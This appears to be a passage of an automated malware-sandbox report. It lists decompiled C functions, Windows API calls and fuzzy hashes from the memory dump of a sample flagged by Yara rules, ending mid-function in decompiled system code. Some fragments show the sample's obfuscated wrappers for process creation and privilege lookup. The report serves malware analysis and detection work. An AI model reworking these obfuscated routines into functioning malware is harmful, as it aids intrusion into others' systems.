                                                              • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                              • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
                                                              • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                              • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 206eddd313d0708127b9343d87c0fe8df817d77eff0369e2f6eb712f27cf6f59
                                                              • Instruction ID: 1d94aae93a223c2a970667e75fe120a73ac6150033e9ec70d589c3c1ff061284
                                                              • Opcode Fuzzy Hash: 206eddd313d0708127b9343d87c0fe8df817d77eff0369e2f6eb712f27cf6f59
                                                              • Instruction Fuzzy Hash: ED01ABB2200108AFCB58CF89DC80EEB37A9AF8C754F158258BA0DE7240C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E0041A7C4(void* __eax, void* __eflags) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t11;
                                                              				intOrPtr* _t13;
                                                              				void* _t15;
                                                              
                                                              				if(__eflags < 0) {
                                                              					return  *((intOrPtr*)( *_t13))( *((intOrPtr*)(_t15 + 0xc)), __eax, _t11);
                                                              				} else {
                                                              					__eax = __eax ^ 0x7d3f3a63;
                                                              					__eflags = __eax;
                                                              					__ebp = __esp;
                                                              					__eax =  *(__ebp + 8);
                                                              					__esi =  *(__ebp + 8) + 0xc8c;
                                                              					__eax =  *(__ebp + 0x10);
                                                              					__eax = LookupPrivilegeValueW( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14)); // executed
                                                              					__esi = __esi;
                                                              					__ebp = __ebp;
                                                              					return __eax;
                                                              				}
                                                              			}









                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                                                              • Instruction ID: a7984e94b4e708b053e011c713a2c9794994ba5b319c447e01f26a3516d4f082
                                                              • Opcode Fuzzy Hash: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                                                              • Instruction Fuzzy Hash: 83F058B62102086BDB10EF99DC81EEB73A9EF88724F10855AFE0C97241C635E9118BB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                              				char _t10;
                                                              				void* _t15;
                                                              
                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                              				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t10;
                                                              				void* _t15;
                                                              
                                                              				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E0041A6A2(int _a4) {
                                                              				intOrPtr _v0;
                                                              				signed int _t6;
                                                              				signed int _t7;
                                                              				int _t13;
                                                              				void* _t14;
                                                              				signed int _t16;
                                                              
                                                              				_t7 = _t6 ^ 0x4f9119c0;
                                                              				_t16 = _t7;
                                                              				_push(0xed848d71);
                                                              				if(_t7 <= 0) {
                                                              					_t9 = _v0;
                                                              					_push(_t16);
                                                              					E0041AF60(_t14, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
                                                              					_t13 = _a4;
                                                              				}
                                                              				ExitProcess(_t13);
                                                              			}










                                                              APIs
                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                                                              • Instruction ID: ab3ca265846676aa369bc085c39992a50e0c52756b469b4d607a6193502350b3
                                                              • Opcode Fuzzy Hash: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                                                              • Instruction Fuzzy Hash: 52E08C762012187BD620DB59CC89FD73BACDB49BA4F0981657A986B283C534EA0086E5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A6B0(intOrPtr _a4, int _a8) {
                                                              				int _t9;
                                                              				void* _t10;
                                                              
                                                              				_t5 = _a4;
                                                              				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                              				_t9 = _a8;
                                                              				ExitProcess(_t9);
                                                              			}






                                                              APIs
                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction ID: 802df7f3fcaafa8157d67aff97ad1a6b93b4f3b5b251eee5c2f3a53fe4d7c84f
                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction Fuzzy Hash: E1F0C2317241599BDB48EB189D91B6A33E5FB9A302F64C039ED49CB241E631ED448390
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 797faf0c60ab00633e8f5b1580c38a9ac3e72eb5602fb726a012436bf289b5eb
                                                              • Instruction ID: aea970cf3095f533016401799d892326578d4ba0d31d666ecf2fc79ee45afe47
                                                              • Opcode Fuzzy Hash: 797faf0c60ab00633e8f5b1580c38a9ac3e72eb5602fb726a012436bf289b5eb
                                                              • Instruction Fuzzy Hash: ADD0A713B11A095791245E896C82AB1FB7492A7814B5496679B0CE7142C546CC045349
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6b33015ef20adc88b66abf6e79c10f8c479e11dd489cda6a3070c3706e7beed
                                                              • Instruction ID: 67a97339fcd9ac4bba31293975eb1fe527449f7b5c7d90943ba4dcef15c770ce
                                                              • Opcode Fuzzy Hash: c6b33015ef20adc88b66abf6e79c10f8c479e11dd489cda6a3070c3706e7beed
                                                              • Instruction Fuzzy Hash: 1AC01237A8B1441ACA12A92EF4803B1F7B8A30B234F2032D3E809AB2408482E491064A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00A68788(signed int __ecx, void* __edx, signed int _a4) {
                                                              				signed int _v8;
                                                              				short* _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				void* _t216;
                                                              				intOrPtr _t231;
                                                              				short* _t235;
                                                              				intOrPtr _t257;
                                                              				short* _t261;
                                                              				intOrPtr _t284;
                                                              				intOrPtr _t288;
                                                              				void* _t314;
                                                              				signed int _t318;
                                                              				short* _t319;
                                                              				intOrPtr _t321;
                                                              				void* _t328;
                                                              				void* _t329;
                                                              				char* _t332;
                                                              				signed int _t333;
                                                              				signed int* _t334;
                                                              				void* _t335;
                                                              				void* _t338;
                                                              				void* _t339;
                                                              
                                                              				_t328 = __edx;
                                                              				_t322 = __ecx;
                                                              				_t318 = 0;
                                                              				_t334 = _a4;
                                                              				_v8 = 0;
                                                              				_v28 = 0;
                                                              				_v48 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v32 = 0;
                                                              				_v52 = 0;
                                                              				if(_t334 == 0) {
                                                              					_t329 = 0xc000000d;
                                                              					L49:
                                                              					_t334[0x11] = _v56;
                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                              					_t334[0x12] = _v60;
                                                              					_t334[0x13] = _v28;
                                                              					_t334[0x17] = _v20;
                                                              					_t334[0x16] = _v48;
                                                              					_t334[0x18] = _v40;
                                                              					_t334[0x14] = _v32;
                                                              					_t334[0x15] = _v52;
                                                              					return _t329;
                                                              				}
                                                              				_v56 = 0;
                                                              				if(E00A68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						_t207 = E00A4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              					}
                                                              					_push(1);
                                                              					_v8 = _t318;
                                                              					E00A6718A(_t207);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				if(E00A68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_t333 =  *_v8;
                                                              					_v60 = _t333;
                                                              					_t314 = E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					_push(_t333);
                                                              					_v8 = _t318;
                                                              					E00A6718A(_t314);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_t216 = E00A68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                              				_t332 = ";";
                                                              				if(_t216 < 0) {
                                                              					L17:
                                                              					if(E00A68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                              						L30:
                                                              						if(E00A68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                              							L46:
                                                              							_t329 = 0;
                                                              							L47:
                                                              							if(_v8 != _t318) {
                                                              								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              							}
                                                              							if(_v28 != _t318) {
                                                              								if(_v20 != _t318) {
                                                              									E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              									_v20 = _t318;
                                                              									_v40 = _t318;
                                                              								}
                                                              							}
                                                              							goto L49;
                                                              						}
                                                              						_t231 = _v24;
                                                              						_t322 = _t231 + 4;
                                                              						_push(_t231);
                                                              						_v52 = _t322;
                                                              						E00A6718A(_t231);
                                                              						if(_t322 == _t318) {
                                                              							_v32 = _t318;
                                                              						} else {
                                                              							_v32 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              						}
                                                              						if(_v32 == _t318) {
                                                              							_v52 = _t318;
                                                              							L58:
                                                              							_t329 = 0xc0000017;
                                                              							goto L47;
                                                              						} else {
                                                              							E00A42340(_v32, _v8, _v24);
                                                              							_v16 = _v32;
                                                              							_a4 = _t318;
                                                              							_t235 = E00A5E679(_v32, _t332);
                                                              							while(1) {
                                                              								_t319 = _t235;
                                                              								if(_t319 == 0) {
                                                              									break;
                                                              								}
                                                              								 *_t319 = 0;
                                                              								_t321 = _t319 + 2;
                                                              								E00A4E2A8(_t322,  &_v68, _v16);
                                                              								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              								_v16 = _t321;
                                                              								_t235 = E00A5E679(_t321, _t332);
                                                              								_pop(_t322);
                                                              							}
                                                              							_t236 = _v16;
                                                              							if( *_v16 != _t319) {
                                                              								E00A4E2A8(_t322,  &_v68, _t236);
                                                              								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              							}
                                                              							if(_a4 == 0) {
                                                              								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                              								_v52 = _v52 & 0x00000000;
                                                              								_v32 = _v32 & 0x00000000;
                                                              							}
                                                              							if(_v8 != 0) {
                                                              								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              							}
                                                              							_v8 = _v8 & 0x00000000;
